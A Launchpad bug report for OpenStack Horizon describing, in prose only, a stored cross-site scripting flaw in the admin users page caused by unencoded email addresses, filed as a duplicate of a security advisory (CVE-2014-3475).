OpenStack Dashboard (Horizon)

Stored XSS for /admin/users/

Bug #1320233 reported by michael xin on 2014-05-16

This bug report is a duplicate of: Bug #1320235: [OSSA 2014-023] Stored XSS for /admin/users/ (CVE-2014-3475). Edit Remove

256

This bug affects 1 person

Affects		Status	Importance	Assigned to	Milestone
	OpenStack Dashboard (Horizon)	New	Undecided	Unassigned
	OpenStack Security Advisory	Incomplete	Undecided	Unassigned

Bug Description

The /admin/users/ page does not output encode users' email addresses correctly. Since there is no user input validation for the users' email address during creation process. It is possible to inject script tag into the email address. This is a stored cross site scripting issue.

The issue can be abused to hijack user's session and implant malware, etc.

For example, attached is a screen copy of Horizon for users with stored XSS in action.

Tristan Cacqueray (tristan-cacqueray) on 2014-05-16

Changed in ossa:
status:	New → Incomplete

Jeremy Stanley (fungi) on 2015-05-01

information type:

Private Security → Public Security

Report a bug

This report contains Public Security information

Everyone can see this security related information.

Duplicate of bug #1320235 Remove

You are

Subscribing...

Edit bug mail

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.